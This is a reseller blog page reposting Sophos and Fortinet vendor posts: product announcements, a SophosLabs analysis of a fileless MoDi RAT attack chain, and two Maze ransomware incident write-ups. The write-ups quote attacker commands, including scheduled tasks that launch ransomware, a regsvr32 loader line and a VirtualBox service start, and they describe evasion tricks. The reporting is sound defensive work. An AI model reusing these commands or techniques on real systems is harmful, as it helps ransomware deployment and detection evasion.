Sophos XG Firewall has joined the robust and growing Nutanix ecosystem that is enabling global enterprises to converge and virtualize their IT infrastructure.
XG Firewall is now Nutanix AHV and Nutanix Flow ready to provide protection for networked applications and traffic in Nutanix virtualized environments. XG Firewall delivers the same kind of easy deployment, management and performance that Nutanix AHV is known for.
Nutanix is the industry leader in hyperconverged infrastructure (HCI) that makes the underlying datacenter and cloud infrastructure invisible, abstracting and elevating it to enable businesses to focus on their applications and services. The Nutanix AHV hypervisor converges private, public, and distributed clouds, bringing simplicity and agility to infrastructure management.
XG Firewall v18 with the new Xstream Architecture running on Nutanix AHV provides deeper visibility into applications, network activity, and threats – able to stop even previously unseen attacks.
Nutanix Flow is a software defined network policy engine built into AHV that provides easy and granular policy-driven application micro-segmentation.
XG Firewall has been validated to provide two modes of operation within Nutanix AHV infrastructure:
XG firewall can provide standard NGFW protection on Nutanix AHV similar to any other physical, virtual, cloud, or hybrid network.
In addition, non-IP bridge mode in XG can be used within the network as part of Nutanix Flow’s micro-segmentation to transparently redirect VM traffic through a virtual XG Firewall running in bridge mode on every AHV host to protect east-west traffic.
XG Firewall can protect traffic entering and leaving the Nutanix AHV infrastructure while also securing traffic moving within the Nutanix Flow software defined network, taking advantage of the granular redirection capabilities of Nutanix Flow micro-segmentation that ensures security protection policies are optimized for individual applications.
XG Firewall’s full suite of protection capabilities will help secure Nutanix applications and network traffic flows, including TLS inspection, intrusion prevention, application control, web protection and filtering, and zero-day threat protection with sandboxing and threat intelligence.
Visit Sophos.com/Firewall to learn more about XG Firewall products.
Net Universe offers all Sophos Devices and subscritpions also consultant services with worldwide Delivery Services. Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/sophos.
We are pleased to announce that Sophos is participating in the 2020 MITRE Engenuity ATT&CK Evaluations for Enterprise Carbanak and FIN7 evaluation with Sophos Intercept X.
The evaluation tests the detection capabilities of endpoint protection and endpoint detection and response (EDR) solutions. The 2020 test utilizes techniques common to the Carbanak and FIN7 threat groups.
MITRE Engenuity states:
These groups carry a firm reputation of utilizing innovative tradecraft. Efficient espionage and stealth are at the forefront of their strategy, as they often rely heavily on scripting, obfuscation, “hiding in plain sight,” and fully exploiting the users behind the machine while pillaging an environment. They also leverage a unique spectrum of operational utilities, spanning both sophisticated malware as well as legitimate administration tools capable of interacting with various platforms (Windows and Linux, including point-of-sale specific technologies).
Carbanak is known for targeting banks, and FIN7 is known for targeting the U.S. retail, restaurant, and hospitality sectors.
This year an optional Protections scenario is also available as part of testing, which Sophos has also chosen to participate in. MITRE Engenuity expects the results and methodology to be available early in 2021.
For more information on the 2020 MITRE Engenuity ATT&CK Evaluations for Enterprise Carbanak and FIN7 evaluation, read MITRE Engenuity’s blog and testing overview.
Net Universe offers all Sophos Devices and subscritpions also consultant services with worldwide Delivery Services. Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/sophos.
SophosLabs researchers Fraser Howard and Andrew O’Donnell stumbled upon an unusual reflective loader attack method last month while hunting through threat telemetry. The attack chain started with a malicious email message that contained some hostile VB scripting code, and concluded by delivering a commodity remote access Trojan named MoDi RAT.
These kinds of detections often lead to interesting, divergent attacks, which is what the detection teams are looking for. Diving down the rabbit hole, Howard and O’Donnell discovered a few intriguing twists to the convoluted attack, which included a Scheduled Task that started a Visual Basic Script file that, in turn, launches PowerShell and then literally pasted the text of the commands into the PowerShell window, rather than passing the command string as a parameter.
But let’s not get ahead of ourselves. Here is Howard’s root cause analysis (RCA) of the attack chain.
AMSI vs. MoDi RAT
The attack analysis pivoted on some of the data collected from Sophos endpoint products using Microsoft’s Antimalware Scan Interface (AMSI). The root cause of the attack triggered our telemetry: a malicious script, delivered (most likely) via spam. In the example below, the user’s browser (Edge, highlighted in red below) started the attack chain, which you can see in this snippet of the threat case.
The attack begins when a recipient of the malspam opens the message attachment. The Visual Basic Script in the message attachment connects to a remote site, which is the entry point into a series of HTTP 302 redirects that eventually lead to a .Zip archive, hosted in OneDrive cloud storage, that contains an encoded VBS (VBE) file.
With the VBE file in hand, we set about reproducing the entire attack to get a complete picture, right through to the payload.
The initial VBScript writes out a second VBS file to the filesystem, and inserts three new entries into the Windows Registry that contain binary data, written out as 8-digit binary numbers. It then launches a system utility to create a new Scheduled Task that, at a predetermined time in the future, launches the VBS script.
When the Scheduled Task runs, it uses wscript.exe to launch the VBS. The VBS code launches PowerShell and then runs this code, which takes data from the VBS and inserts it into the system’s clipboard, where it can then programmatically “paste” the commands into the PowerShell window using the VBS SendKeys command.
This neat little trick to deliver the powershell commands seems designed to evade detection by keeping the commands they execute under the radar, rather than attracting attention by spawning an instance of PowerShell with some interesting command-line parameters that might trigger all sorts of security product alerts. From this point on, the attack is fileless.
In the next step, PowerShell extracts a .NET decoder executable from one of the Registry blobs (labeled Entreurin the Registry) that the VBE had created earlier, and reflectively loads it by injecting it into a system process.
The decoder executable, in turn, extracts the .NET injector and payload blobs (labeled in the Registry as inj and Myfile, respectively) from the Registry. Then the injector loads the payload (injecting into the host application, msbuild.exe).
Notably, the initial Zip payload name (“Timbres-electroniques”) and several other strings, including the Entreur Registry key were comprised of words from the French language. Some of the targets of these attacks were French firms.
The diagram below summarizes all this and illustrates the key components of the attack chain.
The three .NET executable layers (decoder, injector, and payload) do not touch the disk, but we proactively blocked the attack based on our recognition of the technique the attackers employ to deliver the payload filelessly.
Despite already proactively blocking this attack, as a result of our further investigation we were able to enhance existing detections to provide additional resilience against similar attacks we might see in the future.
Why you should upgrade from older Windows
Microsoft’s AMSI framework that helps us intercept and neutralize these kinds of attacks is only available on certain recent flavors of Windows (Windows 10, Windows Server 2016 and Windows Server 2019). If there’s one single reason why users of older versions of Windows should upgrade, it’s this: AMSI protection is crucial to helping us defend against many of today’s attacks, particularly those that use fileless techniques.
This attack typifies how most of the fileless attacks that we see work. AMSI provides the capability for Sophos to proactively protect customers against a range of similar attacks, and the telemetry we’re able to get lets us dive into these rabbit holes so we can identify and enhance our protections more effectively.
Sophos endpoint products will detect the components of this attack as AMSI/Reflect-D, Troj/VBSInj-D, and AMSI/ModiRat-A.
Indicators of compromise
IoCs relating to this investigation have been posted to the SophosLabs Github.
Net Universe offers all Sophos Devices and subscritpions also consultant services with worldwide Delivery Services. Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/sophos.
As school districts across the United States booted up for distance learning, endpoint security became a top priority. Many educational organizations found themselves a target of cybercriminals exploiting the recent pandemic through social engineering attacks—especially now that students and staff have access to the district’s network from their own devices, in their own homes.
Even prior to the COVID-19 pandemic, the number of easily exploited endpoint devices connected to networks was growing rapidly. This increased even moreso with the shift to remote work and learning. This issue is exacerbated by the growing sophistication of cyber threats and the pandemic-related attacks launched by cybercriminals leveraging fear, uncertainty and doubt (FUD) in social engineering attacks.
One U.S. school district found itself procuring 20,000 more laptops to enable its 18,000 students and 2,200 staff members to learn and work from home. With growing concerns around ransomware and phishing—particularly spearphishing—and an incumbent solution that was not meeting their expectations, the school district began looking for a new vendor. An ideal solution would provide remote web filtering, endpoint protection, detection, response and remote remediation.
As an existing Fortinet customer, this district already had a number of solutions across the Fortinet Security Fabric in place, including FortiGate Next-Generation Firewalls (NGFWs), FortiAnalyzer, FortiManager, FortiSandbox, FortiAuthenticator, and FortiClient. Because of this, the district had already seen how Fortinet’s broad, integrated, and automated product portfolio enabled increased visibility, centralized management, and seamless protection across the entire digital attack surface—including remote locations. Both their knowledge of the extensive Fortinet portfolio and the existing trusted partnership between the two led the school district to begin a proof of concept (PoC) of Fortinet’s Endpoint Detection and Response solution, FortiEDR.
FortiEDR delivers real-time, automated threat protection, detection, and response for endpoints—both pre- and post-infection. The key capabilities of FortiEDR include discovery and risk mitigation, next-generation antivirus (NGAV), behavior-based detection, real-time blocking, automated incident response, forensic investigation, threat hunting, and virtual patching capabilities. FortiEDR delivers all of this in a form factor with a lightweight footprint that is easy to deploy, even on devices with limited system resources. And as part of the Security Fabric, FortiEDR could seamlessly integrate with the existing solutions the school district had in place, ensuring centralized management and complete visibility and control across their digital attack surface.
After seeing a variety of ransomware samples being tested and automatically dealt with in real-time during the PoC, this school district determined that FortiEDR met, and even exceeded each of their expectations and was exactly what they were looking for to secure remote access and improve endpoint security among students and staff.
By adopting FortiEDR, this school district saw the following benefits:
Secure remote access and remote web filtering: FortiEDR enables students and staff alike to gain access to the school district’s resources without compromising the security of the network by ensuring consistent remote web filtering.
Enhanced endpoint visibility and resilience: FortiEDR not only gives the school district complete visibility over all endpoint devices connected to the network and ensures that each of those devices are resilient against potential threats.
Improved threat protection: With growing concern around ransomware and targeted spearphishing emails, this school district was relieved to adopt an endpoint security solution that would mitigate those risks and protect students and staff as they work remotely.
With FortiEDR, this school district was well-equipped to secure endpoints during distance learning and well into the future.
Learn more about how FortiEDR has the unique ability to defuse and disarm a threat in real-time, pre- and post-infection.
Customer profile: An organization with many hundreds of networked devices based in Asia Pacific.
The Sophos Managed Threat Response (MTR) team was called in to help an organization targeted with Maze ransomware. The attackers issued a ransom demand for US$15 million – if they had succeeded this would have been one of the most expense ransomware payments to date.
Background: Ransomware partners in crime
Maze is one of the most notorious ransomware families, active since 2019 when it evolved from ChaCha ransomware. It was among the first to combine data encryption with information theft.
The operators behind Maze have recently started colluding with other ransomware groups, including LockBit, SunCrypt and Ragnar Locker, providing them with access to their platform for posting stolen victim data.
This appears to have led to a reciprocal sharing of tactics, techniques and procedures (TTPs): in the attack covered here the Maze group borrowed a Ragnar Locker technique that involves using virtual machines.
For detailed technical analysis of this collaboration between attackers read Maze attackers adopt Ragnar Locker virtual machine technique.
Days 1-3: The attack begins
Prior to the attack becoming active, the operators compromised a computer on the target’s network. This computer was then used as a ‘beach head’ in the network. On multiple occasions during the attack, the attackers connected from here to other computers over Remote Desktop Protocol (RDP).
On day three, the main part of the attack began. The attackers exploited a domain admin account with a weak password to take control of an unprotected Domain Controller (DC). They then spent several days moving across the network.
Using the legitimate network scanning tool Advanced IP Scanner to map the network, the attackers created lists of IP addresses to which they would later deploy ransomware. These included a list of the IP addresses of machines belonging to the target’s IT administrators.
The attackers’ attention then turned to the exfiltration of data.
They identified a file server and accessed it remotely over RDP using the compromised domain admin account. Using the legitimate archiving tools WinRar and 7zip, they started compressing folders located on it.
These archives were then copied back to the primary DC using the legitimate Total Commander FTP client that the attackers had installed on the file server.
The attackers tried to install the cloud storage application Mega on the DC. This was blocked as the target had added Mega to their blocked list using the application control capability in Sophos Intercept X endpoint protection. The attackers then switched to using the web-based version instead, uploading the compressed files.
Days 4-5: The calm before the storm
For two days, the attackers went quiet. It’s likely they were waiting for a day when the target’s IT security team wouldn’t be working, like the weekend.
Day 6: The first ransomware attack is launched
The first Maze ransomware attack was launched on a Sunday, using the already compromised domain admin account and the lists of IP addresses that had been identified.
This first attack actually comprised three attacks as the operators deployed three copies of the Maze ransomware via batch scripts to the targeted computers:
C:ProgramDataenc6.exe
C:ProgramDataenc.exe
C:ProgramDatanetwork.dll
Three scheduled tasks were created to execute the ransomware:
Name
Command
Windows Update Security Patches
C:ProgramDataenc6.exe
Windows Update Security Patches 5
C:ProgramDataenc.exe
Windows Update Security
regsvr32.exe /i c:programdatanetwork.dll
Over 700 computers were targeted in the attack, which was detected and blocked by Sophos Intercept X.
Either the attackers didn’t realize the attack had been blocked or they were hoping that the theft of the data would be enough for the target to pay up – but whatever the reason, upon launching the first attack attempt they issued a ransom demand for US$ 15 million.
Day 7: The MTR team gets to work
Realizing that they were under attack, the target’s security team engaged the advanced incident response skills of the Sophos MTR team. The team quickly identified the compromised admin account, identified and removed several malicious files, and blocked attacker commands and C2 (command and control) communications.
Day 8: Investigation and neutralization continue
Over the following hours the MTR team found further tools and techniques used by the attackers, as well as evidence relating to the exfiltration of data. More files and accounts were blocked.
Day 9: The second attack
The attackers launched a second attack via a different compromised account. This attack was similar to the first one: commands were executed on a DC, looping through the lists of IP addresses contained in txt files.
However, this time they coped a file called license.exe to C:ProgramData:
This was followed by a scheduled task to execute it. In this attack attempt the task was called “Google Chrome Security Update”:
The attack was quickly identified and stopped. Intercept X detected the ransomware, and the MTR team disabled and deleted both the compromised account and the license.exe file. No files were encrypted.
Day 9: Third time lucky?
Just a few hours after the second attempt, the attackers tried again.
By now they seemed to be growing desperate. This attack targeted a single machine, the main file server that the exfiltrated data had been taken from, and used a completely different technique to the previous attacks.
In the third attempt, the attackers distributed the ransomware payload inside a virtual machine (VM).
Fortunately the MTR investigators recognized this new approach immediately as they had also responded to the Ragnar Locker ransomware attack where the technique was first seen.
The Maze operators had enhanced the technique, but it was undoubtedly the same. The attack was detected and stopped and no files were encrypted.
Defeating adversaries in human-led attacks
This casebook highlights how agile and adaptable human-operated attacks can be, with the attackers able to quickly substitute and reconfigure tools and return to the ring for another round. It also demonstrates how, to minimize likelihood of detection, attackers take advantage of multiple legitimate IT tools in their attacks.
Sophos endpoint products detect components of this attack as Troj/Ransom-GAV or Troj/Swrort-EG. Indicators of compromise can be found on the SophosLabs Github.
What can defenders do?
The most important things an IT security team can do is to reduce the attack surface, implement strong security software, including specialist anti-ransomware security, educate employees, and consider setting up or engaging a human threat hunting service to spot the clues that software can’t.
Any organization can be a ransomware target, and any spam or phishing email, exposed RDP port, vulnerable exploitable gateway device or stolen remote access credentials will be enough for such adversaries to gain a foothold.
MITRE ATT&CK Mapping
The MITRE ATT&CK framework is a globally accessible knowledge base of known adversary tactics, techniques and procedures (TTPs). It can help security teams as well as threat hunters and analysts to better understand, anticipate and mitigate attacker behavior.
T1071.001 – Application Layer Protocol: Web Protocols
Exfiltration
T1567.002 – Exfiltration Over Web Service: Exfiltration to Cloud Storage
Impact
T1486 – Data Encrypted for Impact
Sophos Managed Threat Response and threat hunting
For more information on the Sophos MTR service visit our website or speak with a Sophos representative.
If you prefer to conduct your own threat hunts Sophos EDR gives you the tools you need for advanced threat hunting and IT security operations hygiene. Start a 30-day no obligation trial today.
Net Universe offers all Sophos Devices and subscritpions also consultant services with worldwide Delivery Services. Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/sophos.
We’re excited to announce the launch of our new Sophos Techvids video hub!
This new platform features our extensive video library (90+ and counting!) of how-to, configuration, and troubleshooting videos, and improves the viewing experience by introducing new and interactive features such as in-video surveys and easy-to-use navigational elements.
Check out: https://techvids.sophos.com
Interactive in-video features
Feedback surveys: In-video prompts and surveys provide an easy way to share your feedback to help us improve future videos.
Interactive video navigation: Available on most of our current videos, the navigational top-bar is interactive. Click to skip directly to the section of the video you want to view.
Not sure where to start? Here are our most popular videos:
Check out the entire collection at https://techvids.sophos.com today!
Net Universe offers all Sophos Devices and subscritpions also consultant services with worldwide Delivery Services. Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/sophos.
How NIST and eIDAS revisions are shaping the future of e-identification | Yubico
How NIST and eIDAS revisions are shaping the future of e-identification | Yubico
We use cookies to ensure that you get the best experience on our site and to present relevant content and advertising. By browsing this site without restricting the use of cookies, you consent to our and third party use of cookies as set out in our Cookie Notice. Close
We are proud to announce that Sophos has been recognized as a Leader in the IDC MarketScape: Worldwide Mobile Threat Management Software 2020 Vendor Assessment.
The report provides an overview of mobile threat management (MTM) security solutions, also referred to as mobile threat defense (MTD) solutions – an increasingly important security market segment in today’s world, where an increasingly mobile workforce is doing more work on mobile devices than ever.
We believe this placement for Sophos Intercept X for Mobile is a testament to the strength of the Intercept X deep learning engine used across Sophos’ endpoint security range of products. Together with the flexibility of strong management and security capabilities in Sophos Central, the cloud-based management platform for all Sophos products lets organizations manage their mobile, endpoint, server, and network security in the same console.
Furthermore, we believe that this placement is due to Intercept X for Mobile’s seamless integration with the powerful endpoint management capabilities of Sophos Mobile, giving organizations the best of both worlds for mobile threat management (MTM) and unified endpoint management (UEM).
According to the report, “Sophos’ combination of MTM and UEM products is rare among MTM vendors and unique among vendors in this study.”
Intercept X for Mobile is available for Android, iOS, and Chrome OS and offers users world-class device, network, and app security, protecting against the latest mobile threats such as ransomware, network attacks, and exploits. According to the report, “This combination [of MTM and UEM] gives Sophos a strong advantage in situations where enterprises want a single vendor for both mobile device management and security enforcement.”
Sophos Intercept X for Mobile also integrates with a broad range of third-party platforms, including Microsoft Intune and other top UEM vendors – providing organizations with a flexible solution to protect against mobile threats within their unique existing security infrastructures.
To learn more about Intercept X for Mobile, head over to Sophos.com or download and try it for yourself at Google Play or the App Store.
Net Universe offers all Sophos Devices and subscritpions also consultant services with worldwide Delivery Services. Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/sophos.
While conducting an investigation into an attack in July in which the attackers repeatedly attempted to infect computers with Maze ransomware, analysts with Sophos’ Managed Threat Response (MTR) discovered that the attackers had adopted a technique pioneered by the threat actors behind Ragnar Locker earlier this year, in which the ransomware payload was distributed inside of a virtual machine (VM).
In the Maze incident, the threat actors distributed the file-encrypting payload of the ransomware on the VM’s virtual hard drive (a VirtualBox virtual disk image (.vdi) file), which was delivered inside of a Windows .msi installer file more than 700MB in size. The attackers also bundled a stripped down, 11 year old copy of the VirtualBox hypervisor inside the .msi file, which runs the VM as a “headless” device, with no user-facing interface.
The Maze-delivered virtual machine was running Windows 7, as opposed to the Windows XP VM distributed in the Ragnar Locker incident. A threat hunt through telemetry data initially indicated the attackers may have been present on the attack target’s network for at least three days prior to the attack beginning in earnest, but subsequent analysis revealed that the attackers had penetrated the network at least six days prior to delivering the ransomware payload.
The investigation also turned up several installer scripts that revealed the attackers’ tactics, and found that the attackers had spent days preparing to launch the ransomware by building lists of IP addresses inside the target’s network, using one of the target’s domain controller servers, and exfiltrating data to cloud storage provider Mega.nz.
The threat actors initially demanded a $15 million ransom from the target of the attack. The target did not pay the ransom.
How the attack transpired
Subsequent analysis by the MTR team revealed that the attackers orchestrated the attack using batch files, and made multiple attempts to maliciously encrypt machines on the network; The first iteration of ransomware payloads were all copied to the root of the %programdata% folder, using the filenames enc.exe, enc6.exe, and network.dll. The attackers then created scheduled tasks that would launch the ransomware with names based on variants of Windows Update Security or Windows Update Security Patches.
The initial attack did not produce the desired result; The attackers made a second attempt, with a ransomware payload named license.exe, launched from the same location. But before they launched it, they executed a script that disabled Windows Defender’s Real-Time Monitoring feature.
The attackers then, once again, executed a command that would create a scheduled task on each computer they had copied the license.exe payload to, this time named Google Chrome Security Update, and set it up to run once at midnight (in the local time zone of the infected computers).
These detections indicate that the ransomware payloads were being caught and quarantined on machines protected by Sophos endpoint products before they could cause harm. Sophos analysts started to see detections that indicated the malware was triggering the Cryptoguard behavioral protections of Intercept X. In this case, Cryptoguard was preventing the malware from encrypting files by intercepting and neutralizing the Windows APIs that the ransomware was attempting to use to encrypt the hard drive.
So the attackers decided to try a more radical approach for their third attempt.
Weaponized virtual machine
The Maze attackers delivered the attack components for the third attack in the form of an .msi installer file. Inside of the .msi was an installer for both the 32-bit and 64-bit versions of VirtualBox 3.0.4. This version dates back to 2009 and is still branded with its then-publisher’s name, Sun Microsystems.
The .msi also contains a 1.9GB (uncompressed) virtual disk named micro.vdi, which itself contains a bootable partition of Windows 7 SP1, and a file named micro.xml that contains configuration information for the virtual hard drive and session.
The root of that virtual disk contained three files associated with the Maze ransomware: preload.bat, vrun.exe, and a file just named payload (with no file extension), which is the actual Maze DLL payload.
The DLL file has a different, internal name for itself.
The preload.bat file (shown below) modifies the computer name of the virtual machine, generating a series of random numbers to use as the name, and joins the virtual machine to the network domain of the victim organization’s network using a WMI command-line function.
The virtual machine was, apparently, configured in advance by someone who knew something about the victim’s network, because its configuration file (“micro.xml”) maps two drive letters that are used as shared network drives in this particular organization, presumably so it can encrypt the files on those shares as well as on the local machine. It also creates a folder in C:SDRSMLINK and shares this folder with the rest of the network.
At some point (it’s unclear when and how, exactly, it accomplished this), the malware also writes out a file named startup_vrun.bat. We found this file in c:usersAdministratorAppDataRoamingMicrosoftWindowsStart MenuStartup, which means it’s a persistence mechanism that relies on the computer rebooting before the attackers launch the malware.
The script copies the same three files found on the root of the VM disk (the vrun.exe and payload DLL binaries, and the preload.bat batch script) to other disks, then issues a command to shut down the computer immediately. When someone powers the computer on again, the script executes vrun.exe.
The C:SDRSMLINK folder location, created when the .msi file first runs, acts as a clearinghouse for specific folders the malware wants to track. It’s full of symbolic links (symlinks, similar to Windows shortcuts) to folders on the local hard drive.
The Ragnar Locker connection
The technique used in the third attack is completely different to those used before by the threat actors behind Maze, but the investigators recognized it immediately because the team who responded to this Maze attack are the same team that responded to the Ragnar Locker ransomware attack, where the technique was first seen.
In an earlier attack, Ragnar Locker also deployed a virtual machine in an attempt to bypass protection measures
In Sophos’ earlier reporting about Ragnar Locker, we wrote that “Ragnar Locker ransomware was deployed inside an Oracle VirtualBox Windows XP virtual machine. The attack payload was a 122 MB installer with a 282 MB virtual image inside—all to conceal a 49 kB ransomware executable.” MITRE has subsequently added this technique to its ATT&CK framework.
The Maze attackers took a slightly different approach, using a virtual Windows 7 machine instead of XP. This significantly increased the size of the virtual disk, but also adds some new functionality that wasn’t available in the Ragnar Locker version. The threat actors bundled a VirtualBox installer and the weaponized VM virtual drive inside a file named pikujuwusewa.msi. The attackers then used a batch script called starter.bat.to launch the attack from within the VM.
The virtual machine (VM) that Sophos extracted from the Maze attack shows that this (newer) VM is configured in such a way that it allows easy insertion of another ransomware on the attacker’s ‘builder’ machine. But the cost in terms of size is signficant: The Ragnar Locker virtual disk was only a quarter the size of the nearly 2GB virtual disk used in the Maze attack—all just to conceal one 494 KB ransomware executable from detection.
Ragnar Locker
Maze
MSI installer
122 MB OracleVA.msi
733 MB pikujuwusewa.msi
Virtual Disk Image (VDI)
282 MB micro.vdi
1.90 GB micro.vdi
Ransomware binary in VDI
49 KB vrun.exe
494 KB payload
The attackers also executed the following commands on the host computer during the Maze attack:
They attempt to stop Sophos endpoint protection services (which fails).
C:WindowsSystem32cmd.exe /C sc start VBoxDRV
Finally, they start the VirtualBox service and launch the VM.
The future of ransomware?
The Maze threat actors have proven to be adept at adopting the techniques demonstrated to be successful by other ransomware gangs, including the use of extortion as a means to extract payment from victims. As endpoint protection products improve their abilities to defend against ransomware, attackers are forced to expend greater effort to make an end-run around those protections.
Sophos endpoint products detect components of this attack as Troj/Ransom-GAV or Troj/Swrort-EG. Indicators of compromise can be found on the SophosLabs Github.
Net Universe offers all Sophos Devices and subscritpions also consultant services with worldwide Delivery Services. Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/sophos.
SOPHOS AUDIO: Karl Ackerman, Principal Product Manager, discusses the Sophos EDR strategy.
For many organizations, Macs are a regular fixture in their IT estates. Whether they comprise just a few devices or a significant proportion, Macs need the same levels of cybersecurity protection and visibility as their Windows cousins.
Which is why in addition to proven protection from the latest Mac threats, Endpoint Detection and Response (EDR) is now available for Mac users in addition to Windows and Linux.
Intercept X Advanced with EDR gives both IT admins and cybersecurity experts the power to answer critical IT operations and threat hunting questions, and then remotely take any necessary actions.
Upgrade your IT security operations
Maintaining proper IT hygiene can be a significant time investment for IT admins. Being able to identify which devices need attention and what action needs to be taken can add another layer of complexity.
With Sophos EDR, you can now do just that – quickly and easily. For example:
Find devices with software vulnerabilities, unknown services running, or unauthorized browser extensions
Identify devices that have unwanted software
See if software has been deployed on devices, e.g. to make sure a rollout is complete
Remotely access devices to dig deeper and take action, such as installing software, editing configuration files, and rebooting a device
Hunt and neutralize threats
Tracking down subtle, evasive threats requires a tool capable of detecting even the smallest indicators of compromise.
With this release, Sophos EDR is significantly enhancing its threat hunting capabilities. For example:
Detect processes attempting to make a connection on non-standard ports
Get granular detail on unexpected script executions
Identify processes that have created files or modified configuration files
Remotely access a device to deploy additional forensic tools, terminate suspect processes, and run scripts or programs
Introducing Live Discover and Live Response
The features that make solving all the important examples above possible are Live Discover and Live Response.
Live Discover allows you to examine your data for almost any question you can think of by searching across Mac devices with SQL queries. You can choose from a selection of out-of-the-box queries, which can be fully customized to pull the exact information that you need, both when performing IT security operations hygiene and threat hunting tasks. Data is stored on-disk for up to 90 days, meaning query response times are fast and efficient.
Live Response is a command line interface that can remotely access devices in order to perform further investigation or take appropriate action. For example:
Rebooting a device pending updates
Terminating suspicious processes
Browsing the file system
Editing configuration files
Running scripts and programs
And it’s all done remotely, so it’s ideal in working situations where you may not have physical access to a device that needs attention.
Try the new features
Existing Intercept X Advanced with EDR customers will automatically see their Mac devices appearing for selection in Live Discover and Live Response by September 16.
Intercept X and Intercept X for Server customers that would like to try out EDR functionality can head to the Sophos Central console, select ‘Free Trials’ in the left-hand menu and choose the ‘Intercept X Advanced with EDR’ or ‘Intercept X Advanced for Server with EDR’ trial.
If you’re new to Sophos Central, start a no-obligation free trial of Intercept X Advanced with EDR today. You’ll get world class protection against the latest cybersecurity threats in addition to powerful EDR capabilities. Get started.
Live Discover and Live Response are available for Windows, Mac, and Linux devices.
Net Universe offers all Sophos Devices and subscritpions also consultant services with worldwide Delivery Services. Send us an email to [email protected] for more information or visit https://www.netuniversecorp.com/sophos.
This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Cookie settingsACCEPT
Privacy & Cookies Policy
Privacy Overview
This website uses cookies to improve your experience while you navigate through the website. Out of these cookies, the cookies that are categorized as necessary are stored on your browser as they are essential for the working of basic functionalities of the website. We also use third-party cookies that help us analyze and understand how you use this website. These cookies will be stored in your browser only with your consent. You also have the option to opt-out of these cookies. But opting out of some of these cookies may have an effect on your browsing experience.
Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.
Any cookies that may not be particularly necessary for the website to function and is used specifically to collect user personal data via analytics, ads, other embedded contents are termed as non-necessary cookies. It is mandatory to procure user consent prior to running these cookies on your website.
Sophos XG Firewall has joined the robust and growing Nutanix ecosystem that is enabling global enterprises to converge and virtualize their IT infrastructure.
This neat little trick to deliver the powershell commands seems designed to evade detection by keeping the commands they execute under the radar, rather than attracting attention by spawning an instance of PowerShell with some interesting command-line parameters that might trigger all sorts of security product alerts. From this point on, the attack is fileless.
